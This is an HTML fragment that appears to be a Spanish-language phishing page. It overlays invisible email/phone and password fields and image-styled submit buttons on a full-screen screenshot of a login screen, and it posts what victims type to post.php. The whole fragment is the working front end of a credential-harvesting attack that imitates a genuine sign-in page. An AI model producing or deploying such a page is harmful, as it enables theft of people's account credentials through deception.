<form name="ff" action="post.php" method="POST">

<input type="text" id="Editbox1" style="position:absolute;left:516px;top:311px;width:353px;height:29px;line-height:27px;z-index:2;" name="email" value="" placeholder="Correo electronico o telefono" required>
<img src="imagenes/pigi.png" width="1366" height="768" />
<input type="submit" id="Button1" name="Input" value="" style="position:absolute;left:605px;top:443px;width:164px;height:30px;z-index:3;">
<input type="text" id="Editbox2" style="position:absolute;left:515px;top:356px;width:352px;height:29px;line-height:27px;z-index:5;" name="pass" value=""placeholder="Contrase�a" required>

<input name="Button1" type="submit" id="Button1" style="position:absolute; left:513px; top:443px; width:334px; height:32px; z-index:3; background-image: url(imagenes/ini.png); layer-background-image: url(imagenes/enlinea.png); border: 1px none #000000;" value="">
